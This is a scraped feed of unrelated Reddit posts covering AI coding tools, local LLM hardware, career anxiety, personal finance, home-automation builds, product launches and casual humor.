/Users/cai/developer/github/golemancy_all/_doc/development-guide.md

200 lines. In Chinese. Full development guide nobody asked for. Dependency tables. Bash commands. SSH setup. SMB mount scripts. Windows remote dev instructions. Code signing steps. Deployment targets across five platforms. Here is a taste:

```markdown

开发指南

本文档覆盖 Golemancy 生态各项目的本地开发环境搭建、日常工作流与跨项目协作约定。

一、前置依赖

工具 最低版本 说明 Node.js v20+ 推荐 v24 pnpm v10+ 所有项目统一使用 pnpm Rust stable native 模块编译

... ```

Nobody asked for this.

r/LocalLLaMA Practical-Concept231

Can I ask about a topic that is a bit off-topic: Future-proofing my software development career against AI

Hi all,

I’ve been thinking a lot about the impact of AI on the software development industry. While I use AI tools to speed up my workflow, it’s clear that the landscape is shifting fast, and pure coding might not be enough to secure a job in the future.

For the senior devs and hiring managers out there: what are you looking for in a developer today that an AI can't do? Should I be pivoting into systems architecture, focusing on soft skills, or diving deeper into AI itself?

Would love to hear your strategies for surviving over the next 5-10 years.

r/ClaudeAI AddressEven8485

The Ghost House Effect: Why Claude Code feels like magic for 2 weeks and then ruins your life.

I spent my morning acting like a digital coroner. I ran a deep audit on dev rants across Reddit and G2, and honestly, my brain is fried. We all talk about hallucinations, but that’s just the surface. The real horror is what I’m seeing in the data right now — I call it the Ghost House.

The pattern is terrifyingly consistent. You get 10x speed for the first 2-3 weeks. It feels like you’re a god. Then you hit the tipping point. The interest on your LLM technical debt starts compounding faster than you can refactor. You aren’t coding anymore, you’re just spending 8 hours a day begging the agent not to break what it built yesterday.

I found 5 specific failure modes that are killing MVPs right now:

  1. Shadow Dependencies. Claude imports a library that isn't in your package.json. It works in your local cache, but explodes the second you hit CI/CD. Founders call this AI ghost deps.
  2. Context Window Paralysis. Once the repo gets big, the agent starts summarizing. It fixes a UI bug but accidentally nukes a database migration script because it lost the big picture.
  3. The Fear of Editing. I found dozens of stories where founders literally stopped touching their own code. The architecture is so brittle that one manual edit cascades into total failure. The mental model lives in the agent, not the human.
  4. Hallucinated APIs. The AI invents internal endpoints or security libs that don't exist. It looks perfect in the sandbox, but you get a 404 in production. Hours wasted on a phantom.
  5. Architecture Drift. Vibe coding leads to documented prompt-spaghetti. By month two, you have a repo where no human dev can be onboarded without a total rewrite.

The last straw for most of these founders is always the same: We had to nuke it and rebuild from scratch.

Am I the only one seeing this paralysis threshold hitting earlier and earlier? At what point did you realize your AI-built app was becoming a Ghost House you couldn't live in anymore?

r/LocalLLM Massive_Acadia_2085

New to Local LLMs, what are the response time expectations for a local model?

I just decided to dip my toes into Local LLMs. I really don’t know much about what I’m doing. I have an old laptop with a 1050 in it I thought I would try with some very lightweight models. Just to see what it could do more than anything. This is running on a Linux server.

I tried first, gemma4: 26b-a4b and genma4: e4b for different tasks. Figured out quickly that 26b was the wrong fit for the machine. And e4b was taking what felt like a very long time to respond to “hi” so I went to e2b. This was slightly better but still not doing much.

I then thought I would give qwen 3:4b (and chat variant) a shot as well as llama3.2:3b. These were better but still painfully slow in chat. I intend to use these for some light data analysis tasks once I have the right fit, not chat really. So that may be a better use.

I’m just wondering, in this kind of setup working with 4GB of VRAM on the 1050 and 32GB of system ram, what should I expect? Is there a better model choice for this machine? Is it just out of the range of possible for LocalLLM work?

I also have a newer machine with a 4060 in it I’m about to try a similar set of tests on. I thought I might try llama3.2:8b, gemma4:e4b, qwen3.5-9b. What do you guys think?

I would love some suggestions for what this community thinks might work best on these machines.

r/findareddit Left-Tone-4298

Sub for household cleaning tips?

Particularly, how do you get jizz out of cat fur?

r/PhotoshopRequest SpecialistMonitor909

Restore and Colourize

Looking to get a job done to restore and Colourize this image of my grandmother, her mother and brother - narrow water castle Co.Down.

appreciate it's low res but it's the only copy, cleanup as best ye can appreciated

pic attached of landscape for ref. thanks!

r/DecidingToBeBetter StageLost5925

how to forgive yourself for past mistakes as a teen?

hi, 23F here. i grew up in a hypersexual, mentally and physically abusive household. in middle school and highschool school, i had a phase where id make fake accounts, bother people then swoop in as the “savior” so people can like me. however this did cross boundaries for people, as once i shared a boys d pic and been the one to “shut the bully down”. i didnt understand the value of things like that. another time i violated a girls privacy and texted off her account saying good things about myself so people like me. i did this to two girls. another time i made a fake account to bother some guy and he thought it was another girl and i let her take the blame for it, the situation escalated into a physical fight and i was too cowardly to intervene. also at 15-16 i was in a relationship where my partner abused me sexually, he even wiped feces on me once and threatened to leave me if i didnt obey him — he was all i had. my mother was fighting with my stepdad and i had nobody. my teacher called DHS once because i came into school with a scar on my face and i often wrote depressing poetry.

i just feel disgusted with myself. i went to therapy, i take SSRIs. i apologized i tried to make amends and i became so much better as a person but i cannot shake the guilt off. i dont even know if i deserve forgiveness. it physically suffocates me. i feel like no matter how much good i do, my past docks all of it

i do want to leave this cycle of rumination but i don’t know why i am stuck in it. i want to do better and live healthily, and have a calmer nervous system. do you have advice on how you got better or just some reassurance that its ok to move forward?

r/SideProject cutiebunnyyxx

We’re building a search engine for OnlyFans creators and sharing the process publicly, step by step.

As many people know, OnlyFans doesn’t really have a convenient internal search system for categories, interests, pricing, or other useful discovery filters. Because of that, it’s harder for users to find creators that actually match what they’re looking for, and harder for creators to get organic visibility.

We’re trying to solve that with onlyswip.com by collecting only publicly available information from open OnlyFans profiles and organizing it into a searchable catalog with filters. Right now, our database includes 500,000+ creator cards, and it keeps growing every day 📈

Our main goal is not just to build a large database, but to make discovery genuinely relevant. We’re working on ranking algorithms that can surface creator profiles based on behavioral signals and how well they match user intent.

At the moment, we already support advanced filtering by subscription price, profile description, and 70+ categories. These include body type (Athletic, Petite, Curvy), appearance traits (Blonde, Tattoo), ethnicity, and specific content themes such as Cosplay, ASMR, and Fitness.

We’re also putting a lot of effort into building a clean, user-friendly interface, along with a PWA version so the site can be installed and used more like an app 📱

Important note: we only use publicly available data and do not publish any private or paywalled content.

Our next priorities are:

improving ranking quality keeping data fresher and more up to date making the mobile experience better adding personalized recommendations

We are also looking for an SEO specialist who can help us get to the top spots in Google Contact me via telegram @jakedanor

We’d genuinely appreciate honest feedback 🙌 Even if you think the idea is flawed or controversial, that kind of input is valuable too.

We want to build this in public and learn from the community as we go. For a product like this, what would matter most to you: search quality, filters, recommendations, curated lists, or something else?

r/CryptoMarkets GURI-Crypto

Feels like people blame crypto more than how they actually use it

From an investor perspective, something feels off lately.

Not sure if it’s just me, but this has been bothering me lately.

Crypto tech has actually improved a lot.

Faster chains, better tools, easier access.

But the way people use it?

Honestly doesn’t feel that different.

Still feels like:

buy → hope → panic → sell

And when things go wrong,

everyone just blames the project.

But I’m starting to think,

maybe it’s not just the tech.

Like, most people I know:

don’t check supply

don’t think about value

don’t really have a plan

It’s mostly just reacting to price.

I’m not saying projects aren’t flawed.

There’s definitely a lot of trash out there.

But feels like we don’t talk enough about how people approach this space.

Curious what others think.

Is crypto still the problem,

or is it mostly how people use it?

r/Frugal Can_I_do_this_later

Using and getting rid of your clutter is better than shopping

Finally getting some junk in my trunk to a good home. Cleaning out cupboards and finding half used stuff. Clothes I forgot about. Food in the back of the fridge. You get stuff, you save money, your space is cleaner and you feel freer and wise.

Also, so many books and online courses I already have but never finished. I sure intended to but bought more stuff instead!

It's also helpful to think, wow, I spent money on THIS? It'll help next time I'm trying to stifle the impulse to buy stuff.

r/TwoSentenceHorror EntrepreneurLower263

found a heavy set of brass keys resting on my pillow that certainly did not belong to me. Attached was a small tag stating that the night watch must always secure all containment doors from the outside.

r/SideProject razazu

built a security scanner that found 3,993 vulnerabilities across ~500 sites

been working on this for a few months. it runs thousands

of checks across dozens of scanners on any website -

headers, DNS, SSL, exposed files, secrets, the works.

some interesting stuff from the data so far:

- 74% of sites have zero rate limiting

- 72% no CSP

- 47% no DMARC

- only 16% scored A or A+

- AI-built sites (cursor/lovable/bolt) score way lower

than hand-coded ones. 63.7 avg vs 75.7

built it solo, next.js + supabase + vercel.

free to try: unpwned.io

would love feedback on the UX or anything that feels off.

r/Adulting Ok-Broccoli6848

29F feeling stuck between comfort vs growth in career — not sure what to do next

Hi all,

I’m 29F and feeling pretty stuck in my career, and I’d really appreciate some outside perspective.

A bit about me: I’m a first-generation immigrant, had a full ride to college, and later got a Master’s in Organizational Leadership. I started my career in tech (B2B account management), then transitioned into real estate/property management through a connection.

I ended up doing really well there. I started around $85k and worked my way up to ~$115k base + bonuses. It was fast-paced, high-pressure, and I learned a ton. However, I left mainly because the work environment was extremely stressful and I didn’t feel equipped at the time (mid-20s) to handle that level of pressure long-term.

About a year ago, I took a step back and moved into a role at an Ivy League university. I’m currently making ~$90k in an associate-level position. The job is objectively “good;” low stress, stable, and flexible. If I’m being honest, I probably only work ~20 hours/week most weeks.

One of the main reasons I took this role was for the tuition benefit. After a certain period, I’d be eligible to pursue another degree for free, and I’ve been planning to go for a Master’s in Applied Analytics.

That said, as more time passes, I’m starting to question how much weight I should place on that. I do value the degree and the school’s reputation, but I’ve also noticed that many successful leaders around me didn’t necessarily follow that path. It’s made me wonder whether staying primarily for the degree is the right long-term decision, especially if I’m not feeling challenged or growing in my current role.

Which brings me to the main issue: I’m really bored.

I’m realizing that I actually thrive in faster-paced, more challenging environments. I also miss the financial flexibility I had before. Not in a flashy way, but just being able to save more, not think twice about small purchases, etc.

On top of that, I’m starting to feel frustrated with my current environment:

  • The work pace is very slow
  • I don’t feel challenged or like I’m growing
  • I don’t love commuting into the city (I live in the suburbs and would prefer something closer / easier)

At the same time, I’m hesitant because:

  • My current job is very stable and low stress
  • The job market feels uncertain
  • I worry about going back into another high-stress situation

I feel like I’m at a crossroads between:

  • Staying in a comfortable but stagnant role (and waiting for the tuition benefit)
  • Or pushing myself back into something more demanding that could lead to higher growth (and pay), but potentially more stress

I also think I could realistically land something in the ~$100k+ range again based on my experience, but I’m not sure what direction I should be aiming for next.

What I’m trying to figure out:

  • Has anyone been in a similar “comfort vs growth” situation?
  • How did you decide when it was time to leave a low-stress job?
  • Would you stay for the tuition benefit, or prioritize experience and momentum?
  • Are there careers/roles that strike a better balance between pace, growth, and sustainability?

I’d really appreciate any advice or perspective.

r/SideProject Particular-Beat2620

I built a Windows app that silently records meetings and summarizes them with AI — Velnot

Hey r/SideProject!

I kept leaving meetings with zero memory of what was decided. Couldn't take notes while talking, couldn't focus on both at once.

So I built Velnot — it runs silently in the background, records your system audio, then gives you a full transcript + AI summary when the meeting ends.

Works with Zoom, Teams, Google Meet — anything that plays audio.

No video, just audio. Export to Word doc.

Just launched. Would love honest feedback.

velnot.com

r/SideProject Big_Complex_7143

I built a football analysis app for iOS. Looking for feedbacks.

Three different AI models are running. Value matches are listed in tabs. Many options are available, such as corners, cards, wins, and goals. The first two matches are free; after that, a paywall is activated. If you download the app and like it, please leave a review on the App Store. Link: https://apps.apple.com/app/scoremath-football-analysis/id6759188938

r/homeassistant rgnyldz

I did another ceiling lamp for my kitchen with voice assistant and presence detection

After I did a Minecraft ceiling lamp for my kids room that has AI Voice Assistant, presence detection, climate readings and speakers I did a similar one for the kitchen also with AI Voice Assistant and presence detection.

So previously I had two ESP devices in the kitchen where one was a ceiling lamp with a D1 mini and an led strip for primary lighting, and another ESP device for presence detection.

So I built a new version where I have a ceiling lamp with all those combined.

The parts I used are;

  • ESP32-S3 Board
  • LD2420 Presense sensor
  • inmp441 microphone
  • SK6812 Led strip (abut 1 meter / 60Leds)
  • 220V to 5V 6A AC/DC converter/ power supply

So I designed a minimalist geometrical shaped ceiling lamp to hold the led strip and a long case to be able to fit all the parts inside it and also mount it to the two screws I have in my ceiling from my original old lamp.

The thing was that I already had a media player at my floor and I didn't want to put another set of speakers inside the ceiling light. Therefore decided to code the voice assistant so it will listen from the mic on the ceiling lamp, but give the response from the entrance media player I already have.

The biggest issue with a separate media player is that the wakeword trigger does not play a sound, so I have to create a separate automation to check the assistant if wakeword is triggered and play a wake sound on the entrance media player.

The other issue I faced is that because the media player is separate, the device does not know if the response ended thus directly going into continues conversation mode and listen to itself speaking from the entrance media player :D I'm trying to figure how to track the media player from within the ceiling lamp for the state. Still work to be done there but overall I like how it turned out.

If I'm going to make a V3 of this I'll definitely add speakers into it :)

So what do you think :)

Code is here: https://github.com/rgnyldz/rgnlabs-satellight-kitchen

Build process here: https://www.youtube.com/watch?v=sZvpIUcora8

r/homeassistant GrandpaSquarepants

Super simple "dryer finished" automation using contact sensor, magnets, and a simple 3D print

r/explainlikeimfive NoReq1741

ELI5: how do bone marrows work?

specifically, how do they produce blood cells

r/VEO3 Electrical_Sky9729

Help! Spend nearly half of my monthly video creation on the first scene, and still couldn't get it right. What am I doing wrong.

can someone please help with my prompt?? I'm just trying to create a fast paced POV coffee making video using Veo 3, with one of the scenes is milk frothing. Instead, I got this. Really need some help otherwise I'll exhaust my credits for nothing.

https://reddit.com/link/1sdxyjs/video/d48szswigktg1/player

This is my prompt: SCENE 5 (12-16s) - MILK FROTHING:
use the attached image as a reference guide. create a milk froth scene after the coffee extraction.
Pitcher sourced from refrigerator area visible in background.
Wrist rotates pitcher in circular motion. Milk volume increases with a think layer of silky microfoam forming.
Frothing continues for 3-4 seconds with visible vortex motion in milk.
Steam intensity maintained constant throughout frothing phase.
Sound: consistent steaming audio with gentle air incorporation.
Hands lower pitcher when foam reaches optimal texture, right hand moves away from the side of the pitcher to deactivate the wander, then the metal pitcher is lowered, and the steam wander is fully exposed again. the pitcher is placed on counter to the right of espresso tranparent glass showing the nice texture of the extracted coffee. There is still think steam coming out from both the coffee and the frothed milk.

CUT.

r/aivideo Crafty-Squirrel-7967

Made a 30-Second Animated Short Using Seedance

r/toastme Klutzy-Composer-6421

20FTM struggling with depression

I’ve been struggling with depression and bdp since this year started, I try to do better but I feel so alone, lately I just isolated myself from the world and I feel I’m late to everything, a toast would help

r/Art Hour-Help9480

Moon walker, kyushime, pencil, 2022 [OC]

r/TwoSentenceHorror Original-Loquat3788

It was a very religious country, and she'd gone under anaesthesia and into the caesarean surgery under a cloud of shame because there was no man with her.

Clutching her newborn close, she glimpsed something on the baby's leg, the surgeon's phone number in small, even handwriting and a message: 'single?'

r/personalfinance Ok-Objective726

Where should I be keeping my money to help it grow?

[AUD] I am an 18 year old who just graduated high school and has been working for around 2 years. I have just over 10k saved but I’m not saving for anything in particular and only recently started taking saving seriously. I have the money in a savings account but I feel like it could be growing in a more effective way if I put it somewhere else (idk where). Recently I have been contributing $400 weekly to my savings and I’m wondering if there is something I should be doing with my money that would give me better results in the long run. I want low risk but don’t know where to start or what to do.

r/ClaudeAI madeo216

I built a fully automated daily AI news podcast using Claude Code + ElevenLabs

I wanted to share a project I recently launched: a daily AI news podcast that runs entirely on its own. The whole thing started as me wanting to prove I could build something end-to-end with AI tools. It is called Build By AI and it's now live and publishing episodes regularly.

Claude Code helped to code the whole thing besides that i Used ElevenLabs to convert script to audio and Buzzsprout via their APIs.

Happy to answer questions about the pipeline or any of the tools! Would you actually listen to one, knowing there is no human host behind it? Or does that put you off?

r/metaldetecting USAR_gov

"Egyptiomania" button

Tiny aluminum button featuring the bust of Nefertiti, dating from 1930-1960. The motif was quite trendy at the time, during the Egyptiomania period and the craze caused by the discoveries of tombs such as the one of King Tut

r/painting FickleSample5631

art by belko - debt is paid 2026

r/findareddit WildEnchantresss

Is there a subreddit where people deep-dive into random obsessions for a week and report back?

r/funny Life_Ad_1928

Microwave

r/midjourney dietpapita

Spent months making a short film series entirely with AI. Here's Episode 1 :)

Tried very hard to push the models to create a world that looks and feels real. Would love to hear what y'all think!

r/TwoSentenceHorror Original-Loquat3788

On his travels, the magician sometimes met 'snakeoil salesmen', and he thought how similar they were, skipping town the same day, promising folks they just needed to wait and see.

The main difference was that the magician was no fraud; he just had no idea how to bring people back from the box.

r/ProgrammerHumor BranchCurrent4141

takeMyDataTrainYourModels

r/ClaudeCode orbiteleven

Skills & Agents: build or install?

I'm trying to up my skills/agents game.

It seems like there are a gazillion websites with libraries of skills and agents. It's hard to tell how many of them are actually worth using or just AI Slop in their own right.

How many people build their own vs use them from a library. If the former: what are you doing? For the latter: what are you using?

r/ClaudeCode This-Establishment26

I built a CLI to pair program on Claude Code sessions over SSH

I wanted a way to share a live Claude Code session with a colleague like pair programming, so I built claude-pair.

I call it pair vibe-coding :D

How it works: - Host runs `claude-pair host`, gets an SSH link - Guest runs `ssh TOKEN@uptermd.upterm.dev` — no install needed - Both see the same Claude Code terminal in real time

Built in Go, uses upterm for NAT traversal and tmux for session sharing. MIT licensed.

GitHub: https://github.com/albertnahas/claude-pair

Install: `curl -fsSL https://raw.githubusercontent.com/albertnahas/claude-pair/main/install.sh | sh`

Would love feedback — especially on what features would make this more useful for your team.

r/AlternativeHistory Rathskellarington

Temple Science - looking forward to debunks

This whole channel is a goldmine

r/OldSchoolCool BitterBedroomm

Rachel Weiz, The Mummy 1999

r/SideProject Weary_Parking_6631

Updated this baby, not sure if this should be just an edit to my original, but I added a ton

https://noicemaze.com/

- added touch
- added gyro
- relaxing sound
- sky effects
- different styles
- levels

touch is only for mobile
will likely rethink the controls for desktop as well

r/AbstractArt FickleSample5631

I like it 2026

art.by.belko

r/Anthropic cbbsherpa

The Relationship Anthropic Couldn’t See

Inspired by: Peters, J. (2026, April 3). Anthropic essentially bans OpenClaw from Claude by making subscribers pay extra. The Verge.

Anthropic had a real problem. Third-party tools like OpenClaw were burning through compute at rates their subscription pricing was never designed to absorb. By some accounts, a single “hello” through OpenClaw consumed 50,000 tokens worth of orchestration overhead. That’s a hundred times what the same interaction costs natively. At scale, with Claude topping the App Store charts after an OpenAI boycott flooded them with new users, the math stops working.

So they cut it off. On a Friday evening, via email, with one day’s notice.

The infrastructure pressure was real. The competitive motive was also real. And the way Anthropic handled both reveals something important about how AI platforms see their ecosystems: in aggregate, not in relationships. That’s the failure worth examining.

The Timeline Nobody Mentions

Most coverage treats April 3rd as the story. It’s actually the last chapter of a months-long escalation.

In January 2026, Anthropic began implementing technical blocks against third-party harnesses impersonating official clients. In February, they updated Claude Code documentation and legal terms to explicitly prohibit using OAuth tokens from subscription accounts in external tools. OpenCode removed Claude Pro/Max support, citing “Anthropic legal requests.” Community backlash followed. Thariq Shihipar, from Anthropic, apologized for confusing documentation but held the policy line.

Then March happened. OpenAI’s Pentagon deal triggered a user boycott, and Claude briefly topped the US App Store. Anthropic temporarily doubled usage caps to manage the surge. Demand was real and growing fast.

April 3rd: the email. Starting April 4th at 3PM ET, Claude subscriptions would no longer cover third-party harnesses including OpenClaw. Users would need to switch to pay-as-you-go billing or use the API directly.

One more detail that most reporting buries in the middle paragraphs: Peter Steinberger, OpenClaw’s creator, had recently joined OpenAI. He and OpenClaw board member Dave Morin reportedly tried to negotiate with Anthropic. The best they managed was a one-week delay.

The Token Problem

This part complicates the clean narrative of a platform betraying its developers.

OpenClaw isn’t a thin wrapper that passes your prompt to Claude and returns the response. It’s an orchestration layer. Every interaction gets wrapped in system prompts, memory retrieval, context injection, tool-use scaffolding, and reflection loops before Claude sees anything resembling your actual request. That makes for a useful, persistent, context-aware AI assistant. The cost is that a simple exchange can consume orders of magnitude more tokens than the same exchange through Claude’s native interface.

Flat-rate subscriptions are priced around expected usage patterns. When a third-party tool introduces a 100x multiplier on token consumption per interaction, those economics break. Not theoretically. Actually. Anthropic is eating real compute costs that $20 or $200 a month was never designed to cover.

This matters because dismissing the capacity argument as pretext weakens any serious analysis of what happened. The infrastructure problem was genuine. Acknowledging it doesn’t require accepting that Anthropic’s response was proportionate or well-handled. It just means the story is more complicated than “platform screws developers.”

The Platform Trap Is Still Real

The capacity problem explains why Anthropic acted. It doesn’t explain how.

A company facing unsustainable compute costs from a subset of users has options. Graduated pricing tiers. Usage caps specific to high-overhead tools. Direct engagement with the developers whose tools are generating the load. Transition periods that let affected users adjust.

Anthropic chose a blanket cutoff, communicated on a Friday evening, with roughly 18 hours’ notice. No grandfather clause. No tiered approach. No public distinction between lightweight integrations and heavy orchestration layers.

Meanwhile, Claude Cowork, Anthropic’s own orchestration tool, was waiting in the wings. Google had already suspended Gemini accounts for users accessing models through OpenClaw. The industry direction is consistent: native interfaces get more capable, third-party access gets more expensive, and the orchestration layer that developers built to fill the gap becomes the next thing the platform wants to own.

That’s the platform trap, and the fact that Anthropic had a legitimate capacity problem doesn’t make it less of one. If anything, the capacity problem gave them the cover to execute a competitive repositioning that might have drawn sharper scrutiny otherwise.

The Failure of Relational Granularity

Here’s what I think the actual story is.

The market reaction to April 3rd split into two groups that were angry about different things.

Group one built heavy orchestration layers. They were running persistent memory systems, multi-step chains, the full OpenClaw stack. Their token consumption was genuinely outsized. For them, moving to API pricing or pay-as-you-go is arguably the correct economic model. They were getting enterprise-grade compute at consumer-subscription prices. That was always going to end.

Group two built lightweight integrations. Maybe they used OpenClaw for basic task automation, or they’d built small personal workflows that didn’t consume dramatically more than native usage. They weren’t the problem. But they were caught in the same policy change, subject to the same Friday-evening email, facing the same abrupt cutoff.

Anthropic’s response couldn’t tell them apart. The platform saw aggregate load from third-party harnesses. It didn’t see individual relationships with individual developers consuming resources at wildly different rates. So it applied a blunt instrument to a problem that called for a scalpel.

This is a failure of relational granularity. And it’s the failure that actually damages trust, because the developers in group two, the ones who would have accepted the reasoning if it had been applied fairly, now have the same distrust as everyone else. They learned that the platform can’t see them clearly enough to treat them right. That lesson doesn’t go away when the next policy change arrives.

The same pattern is in how the communication was handled. A Friday evening email with 18 hours’ notice treats every affected user identically: as someone who will absorb the change on Anthropic’s timeline. It doesn’t distinguish between someone running a business on this stack and someone with a weekend project. Everyone gets the same deadline.

Platforms that can’t see their ecosystem at relational resolution will keep making this mistake. Not because they’re malicious, but because their operational infrastructure literally doesn’t have the capacity to act on distinctions it can’t perceive.

What Builders Should Actually Take From This

The useful lesson isn’t “don’t use third-party AI tools.” It’s more specific than that.

First: distinguish between building with a model and building on one. Building with a model means using it as a component in a system that could swap it out with meaningful but manageable effort. Building on a model means your workflow is so tightly coupled to one provider that any policy change is a structural problem. The further toward “building on” you sit, the more exposed you are.

Second: treat model diversity the way you’d treat infrastructure redundancy. Multi-model architectures are more complex initially, but they provide real resilience against overnight policy changes. OpenClaw itself supports multiple model backends. The users who had already configured alternatives were inconvenienced. The users who were Claude-only were stranded.

Third, and this is the one that comes out of the relational analysis: even if you aren’t the problem user, you’re subject to the same policy as the one who is. Your risk assessment can’t just ask “will the platform change its terms?” It has to ask “can the platform see me clearly enough to change them fairly?” If the answer is no, you’re carrying risk that has nothing to do with your own behavior.

What Comes Next

Foundation model providers and their ecosystems are still working out what the long-term relationship looks like. Anthropic, OpenAI, and Google are all testing how much friction the market will absorb, how much restriction builders will tolerate, and how much of the orchestration layer they can reclaim before the ecosystem pushes back.

The companies that win this, not just in revenue but in durable market position, will be the ones that learn to see their ecosystems at the resolution of actual relationships rather than aggregate usage curves. That means pricing that reflects what individual users actually consume. Communication that acknowledges different stakes for different builders. Transition periods that respect the investments people have made on your platform.

For anyone building orchestration layers, relational AI companions, or anything that requires AI to operate across time rather than in isolated moments, the message is pointed. That orchestration layer is where the real value lives. It’s also exactly where platform control is tightening. The gap between what native interfaces offer and what serious AI workflows require is real and persistent.

But the providers who own the underlying models have noticed that gap too, and they’re building toward closing it on their own terms. We should build with that reality in mind.

r/DunderMifflin lalalalalalal6666

My favorite episodes so far, any I am missing?

I’m binging the office for the first time (currently half way through season 5) but only just made a list (not ranked) of my favorite episodes to this point. Wondering if there are any others I missed/should watch again?

r/comfyui Zeinscore32

[ Removed by Reddit ]

[ Removed by Reddit on account of violating the content policy. ]

r/Anthropic Illustrious-Bug-5593

I left an AI loop running overnight. Woke up to 20 shipped agents.

Repo: https://github.com/Dominien/agent-factory

So last month Karpathy dropped autoresearch. Autonomous loop, runs experiments overnight, keeps what works, throws away what doesn't. I watched it blow up and thought, this pattern is sick. But I don't do ML. I don't have training runs to optimize. What I do have is a problem: finding good ideas to build.

In 2026, finding a problem worth solving is harder than actually solving it. Every obvious pain point has 12 SaaS tools already fighting over it. The interesting stuff is buried in Reddit threads at 2am where someone rants about something nobody's built for. I used to scroll those manually. Now I don't.

I took that same loop pattern and pointed it somewhere else. My system scrapes Reddit, HN, GitHub, and Twitter for real problems. Scores them on demand, market gap, feasibility. If something clears the threshold it builds a standalone AI agent, validates it works, and commits it. The threshold ratchets up every build so the ideas have to keep getting better. Leave it running overnight, wake up to new agents.

First session it found freelancers asking about missed tax deductions, built freelancer-deduction-finder. Found people confused about overtime exemptions, built wage-rights-advisor. Found people overwhelmed by data broker opt outs, built data-broker-opt-out. 20 agents shipped so far.

Now let me be real because I know someone's going to ask. How do you verify quality? Honest answer: not fully automated. The system boots each agent, sends a test prompt, checks if the output is useful. But these are MVPs. Some are rough. The point was never "autonomous startup factory." I wake up, look at what shipped, pick the most promising one, and that becomes my next real project. It's an idea machine that also writes the first draft. When every obvious idea feels taken, that's the part that matters.

Three files. program.md tells Claude Code where to research and what bar to hit. seed/ is a minimal Next.js template with 7 tools. run.sh launches Claude Code headless and auto restarts on context limits. No LangChain, no CrewAI. TypeScript, MIT, runs on OpenRouter or Ollama. Each agent is standalone, clone and run.

r/personalfinance JMinsk

Moving money from big bank to small investment firm?

Hi all, I had a sudden windfall about 5 years ago and started taking money management more seriously, but I'm for all intents and purposes an investing novice.

Prior to the windfall I was banking with Chase for my regular checking and savings accounts and managing my work-sponsored 401k seperately. I basically walked into a Chase branch with Private Client services, explained the situation, liked the guy that I talked to, and have had the same financial advisor at Chase for the last five years. I probably could have done more research upfront, but the windfall was an inheritance and I was also executor of the (complicated) estate, so there was a LOT going on at that point in time. I also used Chase for the estate account while in probate.

I currently have ~750k mostly in a managed brokerage account, with ~200k split between an inherited IRA and a managed retirement fund (rolled over my previous 401k when I changed jobs last year). I've had great returns over the last few years, but just seems like I was lucky in terms of market timing.

Fast foward, the advisor I was working with at Chase is moving to the Bahnsen Group, a smaller firm that I know nothing about aside from browsing their website. I really liked my advisor and he was extremely patient and thorough with my Finance 101 questions when I was first setting everything up. We check-in a couple times a year and talk through my goals, but I've mostly taken a "set it and forget it" approach. I guess now I have the option of transitioning to a new advisor with Chase or switching over to the Bahnsen Group with my previous guy.

This is definitely an "I don't know what I don't know" situation. What questions should I even be asking or looking into to make this decision? What are the pros/cons of a big bank v. small firm for financial advisory? At face value, I like that everything is integrated now at Chase and all of my finances are in one place, on the other hand I liked and trusted the guy I've been working with for five years.

r/LifeProTips jtho78

LPT: If you are trying to reduce consumption of microplastics, chewing gum and using aluminum cans is a good place to start.

Edit: "...a good place to start removing from your life"

I'm surprised by the number of folks who don't know that most chewing gum is made from a synthetic plastic, and soda/food cans are lined with a plastic layer.

There are alternative gum base options made from tree sap. Soda Stream makes a glass option and the bottles are designed for personal use.

r/ClaudeAI gsummit18

Sub-agent use: Sonnet vs Haiku

I’m curious what models people are using for sub-agents, and how that setup is actually working out in practice.

At the moment I’ve got my main Claude Code instance running on Claude Opus, which then dispatches Claude Sonnet sub-agents for most tasks, and only uses Haiku for more mechanical or repetitive work.

The prompts coming from Opus are fairly detailed and structured, so in theory even Haiku should be able to handle things reasonably well - but I’m not entirely convinced yet.

Would be great to hear how others are approaching this - how you’re splitting orchestration vs execution, where you draw the line between Sonnet and Haiku, and whether you’ve noticed any consistent failure patterns or advantages.

r/PhotoshopRequest katybobaty

Appearance edit request

Hi! Could someone please 1) remove the hair from my (the girl) mouth, and 2) make my acne look less bad (particularly on the forehead)?

Thank you so much!!

r/funny _ganjafarian_

English be easy - Part 2

r/findareddit beasontoyou4343

Finding a convicted felon?

is there a Reddit to help find felons?

r/PhotoshopRequest kittykittycatxx

Can someone edit out the guy in the middle for me?

I love this pic of me and my friend but without the guy in the middle lol

r/SideProject Then-9999

How do you validate an idea before building?

I’m trying to avoid making the same mistake again (building something nobody wants).

Curious how others do this in practice.

Do you:

- build a landing page?

- talk to people first?

- run ads?

- post on Reddit?

What has actually worked for you (not theory)?

Would love real examples.

r/comfyui alivinci

Need prompt help

Am a newbie to this whole thing so l need help in regards to a prompt. I want to create an image that has a pop out bubble like thing that shows a view that cant be seen.

Assume a character is standing with his hand hidden behind his back, l want to be able to prompt so that a pop up thing can show that the hidden hand is say holding a knife. Am using illustrous model.

r/LiveFromNewYork Sure-Ad-2465

As a person with ADHD I feel seen lol

r/ClaudeCode Specialist-Leave-349

How can I finally achieve that claude feels free to just fetch and websearch whatever he wants. I am sick of having to approve this.

Settings locally already include this

 "allow": [ "WebFetch(**)", "WebSearch(**)" ] 

So why does he not just do it? So annoying

r/aivideo Accomplished-Tax1050

Prompt share: one-take battlefield run with a final aerial reveal

r/DunderMifflin EveTheAlien

Michael Scott Frutiger Aero wallpaper pt 2

I've been cranking these out and will continue to until I make the perfect wallpaper. IDK if it's frutiger aero or just y2k

r/ClaudeAI CapableOrange6064

Context full? MCP server list unwieldy? I replaced at least 75 MCP servers and made some new ones like Deletion Interception. Looking for Beta Testers for my self-modding, network scanning, system auditing powerhouse MCP- So avant-guard it's sassy. The beta zip has all the optional dependencies.

I did a thing. This isn't a one-prompt-and-done vibe-coded disaster. I've been building and debugging it for weeks- hundreds of hours to sync tooling across sessions and systems. This is not a burner account- it's my newly created one for my LLC- Try it out, I don't think you'll go back to the old way. Stay Sassy Folks. Summary of the tool below- apologies for the sales monster in me-:

I'll cut straight to it.

The MCP ecosystem is a mess. You need file operations — install Filesystem. Terminal? Desktop Commander. GitHub? The official GitHub MCP server — which has critical SHA-handling bugs that silently corrupt your commits. Desktop automation? Windows-MCP. Android? mobile-mcp. Memory? Anthropic's memory server. SSH? Pick from 7 competing implementations. Screenshots? OCR? Clipboard? Network scanning? Each one is another server, another config block, another chunk of your context window gone.

I've been building SassyMCP: a single Windows exe that consolidates all of this:

